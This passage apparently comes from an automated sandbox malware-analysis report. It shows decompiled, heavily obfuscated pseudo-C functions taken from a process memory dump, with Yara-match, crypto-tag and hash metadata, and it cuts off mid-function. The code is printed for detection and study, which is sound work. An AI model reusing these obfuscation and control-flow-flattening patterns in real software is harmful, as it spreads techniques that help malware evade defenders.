				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) + 0xffff3534;
				_t445 = 0x3d;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) / _t445;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) + 0xffffbc4e;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) ^ 0x0000b338;
				 *(_t458 + 0x5c) = 0xeb2055;
				_t157 = _t458 + 0x5c; // 0xeb2055
				_t446 = 0x27;
				 *(_t458 + 0x5c) =  *_t157 / _t446;
				 *(_t458 + 0x5c) =  *(_t458 + 0x5c) + 0xf727;
				 *(_t458 + 0x5c) =  *(_t458 + 0x5c) ^ 0x00061ec9;
				 *(_t458 + 0x70) = 0x47fd75;
				_t447 = 0x38;
				 *(_t458 + 0x70) =  *(_t458 + 0x70) * 0x4b;
				 *(_t458 + 0x70) =  *(_t458 + 0x70) ^ 0x151aa5c9;
				 *(_t458 + 0x94) = 0x71480;
				 *(_t458 + 0x94) =  *(_t458 + 0x94) >> 0xf;
				 *(_t458 + 0x94) =  *(_t458 + 0x94) ^ 0x000ac54a;
				 *(_t458 + 0x44) = 0x7bf82;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) >> 4;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) / _t447;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) ^ 0x000ef3bb;
				 *(_t458 + 0x88) = 0x5fe667;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) << 2;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) ^ 0x0178e5f6;
				 *(_t458 + 0x20) = 0xdf2a1c;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) >> 0xf;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) + 0xffff3b4a;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) + 0x8959;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) ^ 0xfff05f31;
				 *(_t458 + 0x7c) = 0xc2ce80;
				_t448 = 0x71;
				 *(_t458 + 0x7c) =  *(_t458 + 0x7c) / _t448;
				 *(_t458 + 0x7c) =  *(_t458 + 0x7c) ^ 0x00020205;
				 *(_t458 + 0x74) = 0x8c7ae;
				 *(_t458 + 0x74) =  *(_t458 + 0x74) * 0x1a;
				 *(_t458 + 0x74) =  *(_t458 + 0x74) ^ 0x00e60ce8;
				 *(_t458 + 0x30) = 0xd6e3cb;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) >> 0xf;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) ^ 0x22693c26;
				_t449 = 0x50;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) / _t449;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) ^ 0x006815e9;
				 *(_t458 + 0x40) = 0x5e451e;
				_t450 = 0x55;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) / _t450;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) + 0xe452;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) | 0x7e47935e;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) ^ 0x7e41dc87;
				 *(_t458 + 0x38) = 0x64d679;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) >> 0xd;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) ^ 0x0d922049;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) + 0xffff1786;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) ^ 0x0d93bc9f;
				 *(_t458 + 0x64) = 0x1b4ca2;
				_t451 = 0x54;
				_t456 =  *(_t458 + 0x64);
				 *(_t458 + 0x60) =  *(_t458 + 0x64) / _t451;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) >> 2;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) ^ 0x000c66fe;
				 *(_t458 + 0x50) = 0x45c27f;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) << 8;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) << 0xa;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) ^ 0x09f3ae62;
				 *(_t458 + 0x14) = 0xcbc3ee;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) | 0xadd76dc9;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0xfffff87b;
				_t394 =  *(_t458 + 0x64);
				_t438 =  *(_t458 + 0x64);
				_t452 =  *(_t458 + 0x64);
				 *(_t458 + 0x14) =  *(_t458 + 0x14) * 0x5f;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0x8617258e;
				 *(_t458 + 0x88) = 0xace0bc;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) * 0x57;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) ^ 0x3acf2778;
				 *(_t458 + 0x80) = 0xfb2866;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) + 0xffff2346;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) ^ 0x00fffb65;
				while(1) {
					L1:
					_t370 = 0x465510d;
					L2:
					while(_t396 != 0x4ca64a) {
						if(_t396 == _t370) {
							_t373 = E001CB0D4( *((intOrPtr*)(_t458 + 0x98)), _t452,  *((intOrPtr*)(_t458 + 0xb8)), _t396,  *(_t458 + 0x60),  *(_t458 + 0x40), _t438,  *((intOrPtr*)(_t458 + 0x98)), _t396,  *((intOrPtr*)(_t458 + 0x28)), _t396, _t458 + 0xa8, _t394);
							_t458 = _t458 + 0x2c;
							__eflags = _t373;
							if(_t373 == 0) {
								_t374 =  *(_t458 + 0xa0);
							} else {
								_t454 = _t438;
								while(1) {
									__eflags =  *((intOrPtr*)(_t454 + 4)) - 4;
									if( *((intOrPtr*)(_t454 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t327 = _t454 + 0xc; // 0x1b4cae
									_t435 = _t327;
									_t377 = E001C2C3A( *(_t458 + 0x84), _t327,  *(_t458 + 0x78), _t456,  *(_t458 + 0x2c));
									_t458 = _t458 + 0xc;
									__eflags = _t377;
									if(_t377 == 0) {
										_t374 = 1;
										 *(_t458 + 0xa0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t452 =  *(_t458 + 0x64);
									goto L25;
									L19:
									_t376 =  *_t454;
									__eflags = _t376;
									if(_t376 == 0) {
										_t374 =  *(_t458 + 0xa0);
									} else {
										_t454 = _t454 + _t376;
										__eflags =  *((intOrPtr*)(_t454 + 4)) - 4;
										if( *((intOrPtr*)(_t454 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t374;
							if(__eflags == 0) {
								_t370 = 0x465510d;
								_t396 = 0x465510d;
								continue;
							} else {
								_t435 =  *(_t458 + 0x44);
								E001C7513( *((intOrPtr*)( *0x1e5214 + 0x14)),  *(_t458 + 0x44),  *(_t458 + 0x38),  *(_t458 + 0x60));
								_t396 = 0x52d1d29;
								goto L1;
							}
							L31:
						} else {
							if(_t396 == 0x52d1d29) {
								_t435 =  *(_t458 + 0x54);
								E001CAE43(_t438,  *(_t458 + 0x54),  *(_t458 + 0x14));
								_t396 = 0x4ca64a;
								while(1) {
									L1:
									_t370 = 0x465510d;
									goto L2;
								}
							} else {
								if(_t396 == 0x6a2ac4c) {
									E001D855C(_t458 + 0xb4,  *(_t458 + 0x40), __eflags,  *(_t458 + 0x2c),  *(_t458 + 0x5c), _t396,  *(_t458 + 0x7c));
									_t435 =  *(_t458 + 0xb0);
									_t382 = E001C2B69( *(_t458 + 0x24),  *(_t458 + 0xb0), _t458 + 0xbc,  *(_t458 + 0x54));
									_t456 = _t382;
									_t458 = _t458 + 0x18;
									_t396 = 0x8bdce4a;
									 *((short*)(_t382 - 2)) = 0;
									while(1) {
										L1:
										_t370 = 0x465510d;
										goto L2;
									}
								} else {
									if(_t396 == 0x8bdce4a) {
										_t386 = E001DB302(_t458 + 0xc0, _t435,  *(_t458 + 0x60),  *(_t458 + 0x80), 1, 0x2000000,  *(_t458 + 0x80),  *(_t458 + 0x88), _t396,  *((intOrPtr*)(_t458 + 0x98)),  *(_t458 + 0x20),  *(_t458 + 0x9c),  *(_t458 + 0x94) | 0x00000006);
										_t394 = _t386;
										_t458 = _t458 + 0x2c;
										__eflags = _t386 - 0xffffffff;
										if(__eflags != 0) {
											_t396 = 0x99d27ae;
											while(1) {
												L1:
												_t370 = 0x465510d;
												goto L2;
											}
										}
									} else {
										if(_t396 == 0x99d27ae) {
											_t452 = 0x1000;
											_push(_t396);
											_push(_t396);
											 *(_t458 + 0x70) = 0x1000;
											_t438 = E001D5212(0x1000);
											_t458 = _t458 + 0xc;
											__eflags = _t438;
											_t370 = 0x465510d;
											_t396 =  !=  ? 0x465510d : 0x4ca64a;
											continue;
										} else {
											if(_t396 != 0xc84d6e5) {
												L29:
												__eflags = _t396 - 0xb25d194;
												if(__eflags != 0) {
													continue;
												}
											} else {
												_t396 = 0x6a2ac4c;
												continue;
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E001D4A33( *(_t458 + 0x88),  *(_t458 + 0x80), _t394);
					_t396 = 0xb25d194;
					_t370 = 0x465510d;
					goto L29;
				}
			}


























                          0x001d00a0
                          0x001d00aa
                          0x001d00b2
                          0x001d00b7
                          0x001d00bc
                          0x001d00c4
                          0x001d00cc
                          0x001d00d7
                          0x001d00df
                          0x001d00ea
                          0x001d00f2
                          0x001d00f7
                          0x001d00ff
                          0x001d0111
                          0x001d0116
                          0x001d0121
                          0x001d0122
                          0x001d012c
                          0x001d0130
                          0x001d0138
                          0x001d0140
                          0x001d014d
                          0x001d0151
                          0x001d0159
                          0x001d0161
                          0x001d0169
                          0x001d0171
                          0x001d0176
                          0x001d017b
                          0x001d0183
                          0x001d018e
                          0x001d0196
                          0x001d01a1
                          0x001d01a9
                          0x001d01ad
                          0x001d01b5
                          0x001d01bd
                          0x001d01c5
                          0x001d01d0
                          0x001d01db
                          0x001d01e6
                          0x001d01ee
                          0x001d01f6
                          0x001d01fb
                          0x001d0203
                          0x001d0210
                          0x001d0214
                          0x001d021c
                          0x001d0221
                          0x001d0229
                          0x001d0236
                          0x001d0240
                          0x001d0244
                          0x001d024c
                          0x001d0254
                          0x001d025c
                          0x001d0264
                          0x001d026f
                          0x001d027a
                          0x001d0285
                          0x001d028d
                          0x001d0295
                          0x001d02a3
                          0x001d02a8
                          0x001d02ae
                          0x001d02b6
                          0x001d02c1
                          0x001d02c9
                          0x001d02d4
                          0x001d02dc
                          0x001d02e1
                          0x001d02e9
                          0x001d02f1
                          0x001d02fd
                          0x001d0302
                          0x001d0308
                          0x001d0310
                          0x001d0318
                          0x001d0320
                          0x001d032c
                          0x001d0331
                          0x001d0337
                          0x001d033f
                          0x001d0347
                          0x001d034f
                          0x001d0353
                          0x001d0358
                          0x001d035e
                          0x001d0366
                          0x001d036e
                          0x001d037b
                          0x001d037e
                          0x001d0382
                          0x001d038a
                          0x001d0395
                          0x001d039d
                          0x001d03a8
                          0x001d03b0
                          0x001d03bd
                          0x001d03c1
                          0x001d03c9
                          0x001d03d4
                          0x001d03dc
                          0x001d03e7
                          0x001d03ef
                          0x001d03f4
                          0x001d03fc
                          0x001d0404
                          0x001d040c
                          0x001d0418
                          0x001d041d
                          0x001d0421
                          0x001d0429
                          0x001d0436
                          0x001d043a
                          0x001d0442
                          0x001d044a
                          0x001d044f
                          0x001d045d
                          0x001d0462
                          0x001d0468
                          0x001d0470
                          0x001d047c
                          0x001d0481
                          0x001d0487
                          0x001d048f
                          0x001d0497
                          0x001d049f
                          0x001d04a7
                          0x001d04ac
                          0x001d04b4
                          0x001d04bc
                          0x001d04c4
                          0x001d04d0
                          0x001d04d3
                          0x001d04d7
                          0x001d04db
                          0x001d04e0
                          0x001d04e8
                          0x001d04f0
                          0x001d04f5
                          0x001d04fa
                          0x001d0502
                          0x001d050a
                          0x001d0512
                          0x001d051f
                          0x001d0523
                          0x001d0527
                          0x001d052b
                          0x001d052f
                          0x001d0537
                          0x001d054a
                          0x001d0551
                          0x001d055c
                          0x001d0567
                          0x001d0572
                          0x001d057d
                          0x001d057d
                          0x001d057d
                          0x00000000
                          0x001d0582
                          0x001d0590
                          0x001d0705
                          0x001d070a
                          0x001d070d
                          0x001d070f
                          0x001d074e
                          0x001d0711
                          0x001d0711
                          0x001d0713
                          0x001d0713
                          0x001d0717
                          0x00000000
                          0x00000000
                          0x001d0719
                          0x001d071d
                          0x001d071d
                          0x001d072c
                          0x001d0731
                          0x001d0734
                          0x001d0736
                          0x001d0744
                          0x001d0745
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001d075e
                          0x001d075e
                          0x00000000
                          0x001d0738
                          0x001d0738
                          0x001d073a
                          0x001d073c
                          0x001d0757
                          0x001d073e
                          0x001d073e
                          0x001d0713
                          0x001d0717
                          0x00000000
                          0x00000000
                          0x001d0717
                          0x00000000
                          0x001d073c
                          0x001d0713
                          0x001d0762
                          0x001d0762
                          0x001d0764
                          0x001d078c
                          0x001d0791
                          0x00000000
                          0x001d0766
                          0x001d076e
                          0x001d077b
                          0x001d0782
                          0x00000000
                          0x001d0782
                          0x00000000
                          0x001d0596
                          0x001d059c
                          0x001d06bf
                          0x001d06c5
                          0x001d06cb
                          0x001d057d
                          0x001d057d
                          0x001d057d
                          0x00000000
                          0x001d057d
                          0x001d05a2
                          0x001d05a8
                          0x001d0685
                          0x001d068e
                          0x001d06a1
                          0x001d06a6
                          0x001d06a8
                          0x001d06ad
                          0x001d06b2
                          0x001d057d
                          0x001d057d
                          0x001d057d
                          0x00000000
                          0x001d057d
                          0x001d05ae
                          0x001d05b4
                          0x001d0650
                          0x001d0655
                          0x001d0657
                          0x001d065a
                          0x001d065d
                          0x001d0663
                          0x001d057d
                          0x001d057d
                          0x001d057d
                          0x00000000
                          0x001d057d
                          0x001d057d
                          0x001d05b6
                          0x001d05bc
                          0x001d05d5
                          0x001d05e6
                          0x001d05e7
                          0x001d05e9
                          0x001d05f2
                          0x001d05f4
                          0x001d05f7
                          0x001d05fe
                          0x001d0603
                          0x00000000
                          0x001d05be
                          0x001d05c4
                          0x001d07b7
                          0x001d07b7
                          0x001d07bd
                          0x00000000
                          0x00000000
                          0x001d05ca
                          0x001d05ca
                          0x00000000
                          0x001d05ca
                          0x001d05c4
                          0x001d05bc
                          0x001d05b4
                          0x001d05a8
                          0x001d059c
                          0x001d07c6
                          0x001d07cf
                          0x00000000
                          0x001d07cf
                          0x001d07a7
                          0x001d07ad
                          0x001d07b2
                          0x00000000
                          0x001d07b2

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &<i"$R$U $g_$s<`
                          • API String ID: 0-3547921069
                          • Opcode ID: bc9981b51611b4b630f0f23a78f4c8b8f460d21fb4a30d1e887f7fe9da945fe0
                          • Instruction ID: 4a41a7eeb5bf4c424e5d2a799cc97a5d47f06628cef557718999b0134ec898ff
                          • Opcode Fuzzy Hash: bc9981b51611b4b630f0f23a78f4c8b8f460d21fb4a30d1e887f7fe9da945fe0
                          • Instruction Fuzzy Hash: 810252715083809FD368CF25C989A4BBBE1BBC4758F108A1EF5DA9A260D7B4D909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DCE90, Relevance: 6.5, Strings: 5, Instructions: 292COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E001DCE90(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t324;
				void* _t326;
				void* _t335;
				void* _t341;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				void* _t359;
				intOrPtr* _t386;
				void* _t390;
				signed int* _t391;

				_t391 =  &_v156;
				_t386 = __ecx;
				_v4 = __ecx;
				_v112 = 0x5b74b2;
				_v112 = _v112 + 0xffffa8c5;
				_v112 = _v112 << 1;
				_v112 = _v112 ^ 0x00b63aee;
				_v72 = 0x5e5157;
				_t10 =  &_v72; // 0x5e5157
				_v72 =  *_t10 * 0x62;
				_v72 = _v72 ^ 0x241b234e;
				_t390 = 0;
				_v32 = 0x9f59f7;
				_t341 = 0x7e7d422;
				_v32 = _v32 | 0x5adc4522;
				_v32 = _v32 ^ 0x5adf5df7;
				_v144 = 0x461985;
				_v144 = _v144 >> 6;
				_v144 = _v144 + 0x92eb;
				_v144 = _v144 | 0xd7bd3f47;
				_v144 = _v144 ^ 0xd7bdbf57;
				_v88 = 0xa8b3ee;
				_v88 = _v88 + 0x9e6e;
				_v88 = _v88 + 0xffff2941;
				_v88 = _v88 ^ 0x00a87b9d;
				_v48 = 0x4a7f3d;
				_t344 = 0x72;
				_v48 = _v48 / _t344;
				_v48 = _v48 ^ 0x0001f5e4;
				_v92 = 0x998e5d;
				_v92 = _v92 + 0xe0f3;
				_t345 = 0x12;
				_v92 = _v92 / _t345;
				_v92 = _v92 ^ 0x0009a864;
				_v148 = 0xa04ccc;
				_v148 = _v148 >> 4;
				_t346 = 0xd;
				_v148 = _v148 / _t346;
				_t347 = 0x62;
				_v148 = _v148 / _t347;
				_v148 = _v148 ^ 0x000d2b48;
				_v100 = 0x49f295;
				_v100 = _v100 | 0x20544f2c;
				_t75 =  &_v100; // 0x20544f2c
				_t348 = 0x11;
				_v100 =  *_t75 / _t348;
				_v100 = _v100 ^ 0x01e64bb6;
				_v140 = 0x446fdd;
				_v140 = _v140 + 0xc41;
				_v140 = _v140 ^ 0x4f39ba92;
				_v140 = _v140 + 0x26b0;
				_v140 = _v140 ^ 0x4f73f21e;
				_v24 = 0xbca556;
				_v24 = _v24 ^ 0x6e40869f;
				_v24 = _v24 ^ 0x6ef14e65;
				_v40 = 0x7e8551;
				_v40 = _v40 * 0x41;
				_v40 = _v40 ^ 0x201ae365;
				_v104 = 0x8bf2e8;
				_v104 = _v104 | 0x0c3002af;
				_t349 = 0x2c;
				_v104 = _v104 * 0x67;
				_v104 = _v104 ^ 0x1f9920ce;
				_v116 = 0xc81b9b;
				_v116 = _v116 * 0x18;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0003e30f;
				_v44 = 0xd37f22;
				_v44 = _v44 ^ 0x2e1471af;
				_v44 = _v44 ^ 0x2ec8d05d;
				_v52 = 0xc8d41d;
				_v52 = _v52 * 0x4f;
				_v52 = _v52 ^ 0x3df5adc6;
				_v60 = 0xb8beac;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x000f9eca;
				_v68 = 0x269fbd;
				_v68 = _v68 >> 0xb;
				_v68 = _v68 ^ 0x00041e96;
				_v36 = 0x8cfac0;
				_v36 = _v36 | 0xf628ff53;
				_v36 = _v36 ^ 0xf6a5a5de;
				_v96 = 0xce5c3b;
				_v96 = _v96 | 0xe6236d23;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x0032ff20;
				_v124 = 0x412f8f;
				_v124 = _v124 ^ 0x2ae7f4e1;
				_v124 = _v124 << 6;
				_v124 = _v124 | 0xc9b912e1;
				_v124 = _v124 ^ 0xe9b5ce4c;
				_v132 = 0x7f023e;
				_v132 = _v132 ^ 0xa02a8a09;
				_v132 = _v132 * 9;
				_v132 = _v132 + 0xb80;
				_v132 = _v132 ^ 0xa301fd04;
				_v64 = 0x2390e7;
				_v64 = _v64 | 0x07282702;
				_v64 = _v64 ^ 0x072a7736;
				_v12 = 0x4ed310;
				_v12 = _v12 ^ 0xa26db4f7;
				_v12 = _v12 ^ 0xa2294a47;
				_v56 = 0x4be76e;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x0007bf8e;
				_v76 = 0x1407ea;
				_v76 = _v76 + 0x9c75;
				_v76 = _v76 ^ 0x0016a469;
				_v84 = 0x3b88d1;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x72810e5c;
				_v84 = _v84 ^ 0x7286a24d;
				_v136 = 0xbd4d16;
				_v136 = _v136 + 0xffffbc79;
				_v136 = _v136 + 0xffff4819;
				_v136 = _v136 << 0xf;
				_v136 = _v136 ^ 0x28d68651;
				_v152 = 0xda1d4a;
				_v152 = _v152 | 0x9c85dfe3;
				_v152 = _v152 + 0xffffd974;
				_v152 = _v152 + 0x8244;
				_v152 = _v152 ^ 0x9cec8bb1;
				_v80 = 0xfd3fc2;
				_v80 = _v80 / _t349;
				_v80 = _v80 + 0xffff2aa9;
				_v80 = _v80 ^ 0x0000fb37;
				_v16 = 0x9425a6;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00247dad;
				_v156 = 0x6d219a;
				_v156 = _v156 | 0xffeffff5;
				_v156 = _v156 ^ 0xffeff45b;
				_v128 = 0x965e44;
				_v128 = _v128 + 0xe806;
				_v128 = _v128 * 0x4f;
				_v128 = _v128 ^ 0xa8e25781;
				_v128 = _v128 ^ 0x86408e31;
				_v108 = 0x6d7dbb;
				_v108 = _v108 + 0xffffc4a3;
				_v108 = _v108 | 0xcce549e6;
				_v108 = _v108 ^ 0xccefa603;
				_v120 = 0x16cc41;
				_v120 = _v120 | 0xde7fffee;
				_v120 = _v120 ^ 0xde7d4f99;
				_v20 = 0xa31c76;
				_v20 = _v20 + 0xffff22cd;
				_v20 = _v20 ^ 0x00a6a38f;
				_v28 = 0x8afd7c;
				_v28 = _v28 | 0xf31dc3e8;
				_v28 = _v28 ^ 0xf3972035;
				while(1) {
					L1:
					_t324 = 0xd21895a;
					do {
						while(_t341 != 0x4cec912) {
							if(_t341 == 0x7e7d422) {
								_t341 = 0x907b137;
								continue;
							} else {
								if(_t341 == 0x907b137) {
									_push(_v148);
									_push(_v92);
									_t326 = E001DCD35(0x1c1380, _v48, __eflags);
									_push(_v24);
									_push(_v140);
									__eflags = E001DD96C(_v40, _v104,  &_v8, _v112, _v116, E001DCD35(0x1c1250, _v100, __eflags), _t326) - _v72;
									_t341 =  ==  ? 0xd21895a : 0xe98e6d2;
									E001D629F(_v44, _t326, _v52, _v60, _v68);
									E001D629F(_v36, _t327, _v96, _v124, _v132);
									_t386 = _v4;
									_t391 =  &(_t391[0xf]);
									L10:
									_t324 = 0xd21895a;
								} else {
									_t396 = _t341 - _t324;
									if(_t341 == _t324) {
										_push(_v56);
										_push(_v12);
										_t335 = E001DCD35(0x1c12a0, _v64, _t396);
										_pop(_t359);
										_t267 =  &_v152; // 0xd2b48
										E001D9F1C(_v76,  *_t386, _t359,  *((intOrPtr*)(_t386 + 4)), _v84, _v8, _v32, _v136, _t335,  *_t267, _v80,  *0x1e5220 + 0x54);
										_t341 = 0x4cec912;
										_t390 =  ==  ? 1 : _t390;
										E001D629F(_v16, _t335, _v156, _v128, _v108);
										_t391 =  &(_t391[0xd]);
										goto L1;
									}
								}
							}
							goto L11;
						}
						E001D4827(_v8, _v120, _v88, _v20, _v28);
						_t391 =  &(_t391[3]);
						_t341 = 0xe98e6d2;
						goto L10;
						L11:
						__eflags = _t341 - 0xe98e6d2;
					} while (__eflags != 0);
					return _t390;
				}
			}
























































                          0x001dce90
                          0x001dce9a
                          0x001dce9c
                          0x001dcea3
                          0x001dcead
                          0x001dceb5
                          0x001dceb9
                          0x001dcec1
                          0x001dcec9
                          0x001dcece
                          0x001dced2
                          0x001dceda
                          0x001dcedc
                          0x001dcee7
                          0x001dceec
                          0x001dcef7
                          0x001dcf02
                          0x001dcf0a
                          0x001dcf0f
                          0x001dcf17
                          0x001dcf1f
                          0x001dcf27
                          0x001dcf2f
                          0x001dcf37
                          0x001dcf3f
                          0x001dcf47
                          0x001dcf55
                          0x001dcf5a
                          0x001dcf63
                          0x001dcf6e
                          0x001dcf76
                          0x001dcf82
                          0x001dcf87
                          0x001dcf8d
                          0x001dcf95
                          0x001dcf9d
                          0x001dcfa6
                          0x001dcfab
                          0x001dcfb5
                          0x001dcfba
                          0x001dcfc0
                          0x001dcfc8
                          0x001dcfd0
                          0x001dcfd8
                          0x001dcfdc
                          0x001dcfdf
                          0x001dcfe3
                          0x001dcfeb
                          0x001dcff3
                          0x001dcffb
                          0x001dd003
                          0x001dd00b
                          0x001dd013
                          0x001dd01e
                          0x001dd029
                          0x001dd034
                          0x001dd047
                          0x001dd04e
                          0x001dd059
                          0x001dd063
                          0x001dd072
                          0x001dd073
                          0x001dd077
                          0x001dd07f
                          0x001dd08c
                          0x001dd090
                          0x001dd095
                          0x001dd09d
                          0x001dd0a8
                          0x001dd0b3
                          0x001dd0be
                          0x001dd0cb
                          0x001dd0cf
                          0x001dd0d7
                          0x001dd0df
                          0x001dd0e4
                          0x001dd0ec
                          0x001dd0f4
                          0x001dd0f9
                          0x001dd101
                          0x001dd10c
                          0x001dd117
                          0x001dd122
                          0x001dd12a
                          0x001dd132
                          0x001dd137
                          0x001dd13f
                          0x001dd147
                          0x001dd14f
                          0x001dd154
                          0x001dd15c
                          0x001dd164
                          0x001dd16c
                          0x001dd179
                          0x001dd17d
                          0x001dd185
                          0x001dd18d
                          0x001dd195
                          0x001dd19d
                          0x001dd1a5
                          0x001dd1b0
                          0x001dd1bb
                          0x001dd1c6
                          0x001dd1ce
                          0x001dd1d3
                          0x001dd1db
                          0x001dd1e3
                          0x001dd1eb
                          0x001dd1f3
                          0x001dd1fb
                          0x001dd200
                          0x001dd208
                          0x001dd210
                          0x001dd218
                          0x001dd220
                          0x001dd228
                          0x001dd22d
                          0x001dd235
                          0x001dd23d
                          0x001dd245
                          0x001dd24d
                          0x001dd255
                          0x001dd25d
                          0x001dd26b
                          0x001dd26f
                          0x001dd277
                          0x001dd27f
                          0x001dd28a
                          0x001dd292
                          0x001dd29d
                          0x001dd2a5
                          0x001dd2ad
                          0x001dd2b5
                          0x001dd2bd
                          0x001dd2ca
                          0x001dd2ce
                          0x001dd2d6
                          0x001dd2de
                          0x001dd2e6
                          0x001dd2ee
                          0x001dd2f6
                          0x001dd2fe
                          0x001dd306
                          0x001dd30e
                          0x001dd316
                          0x001dd321
                          0x001dd32c
                          0x001dd337
                          0x001dd342
                          0x001dd34d
                          0x001dd358
                          0x001dd358
                          0x001dd358
                          0x001dd35d
                          0x001dd35d
                          0x001dd36f
                          0x001dd4d1
                          0x00000000
                          0x001dd375
                          0x001dd37b
                          0x001dd415
                          0x001dd41e
                          0x001dd429
                          0x001dd42e
                          0x001dd43c
                          0x001dd484
                          0x001dd492
                          0x001dd4a3
                          0x001dd4c0
                          0x001dd4c5
                          0x001dd4cc
                          0x001dd505
                          0x001dd505
                          0x001dd381
                          0x001dd381
                          0x001dd383
                          0x001dd389
                          0x001dd392
                          0x001dd39d
                          0x001dd3a3
                          0x001dd3b3
                          0x001dd3db
                          0x001dd3ef
                          0x001dd3f8
                          0x001dd408
                          0x001dd40d
                          0x00000000
                          0x001dd40d
                          0x001dd383
                          0x001dd37b
                          0x00000000
                          0x001dd36f
                          0x001dd4f8
                          0x001dd4fd
                          0x001dd500
                          0x00000000
                          0x001dd50a
                          0x001dd50a
                          0x001dd50a
                          0x001dd522
                          0x001dd522

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,OT $H+$H+$WQ^$nK
                          • API String ID: 0-4252230371
                          • Opcode ID: 94e37f0d3b3d52a64800916eabdf4ae2f8bd9cbf49fda106d022100b03ab5c2a
                          • Instruction ID: 2c7a50cf95055a07233739ffef0da2b611f272a4654956a363d16118c279aa2a
                          • Opcode Fuzzy Hash: 94e37f0d3b3d52a64800916eabdf4ae2f8bd9cbf49fda106d022100b03ab5c2a
                          • Instruction Fuzzy Hash: B0F111715083809FD368CF65C58AA4BFBF2BBC5708F10891DE2DA96260D7B58909CF07
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CA3E7, Relevance: 6.5, Strings: 5, Instructions: 257COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E001CA3E7(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* _t249;
				intOrPtr _t252;
				void* _t255;
				intOrPtr _t264;
				intOrPtr _t268;
				intOrPtr* _t269;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				intOrPtr _t315;
				signed int* _t316;

				_t269 = __ecx;
				_t316 =  &_v220;
				_v168 = __ecx;
				_v144 = 0xd84507;
				_v144 = _v144 * 0x70;
				_t312 = 0x4fa9762;
				_v144 = _v144 ^ 0x5e9f127d;
				_v204 = 0xa7c13a;
				_v204 = _v204 + 0x1c61;
				_v204 = _v204 + 0xa5c;
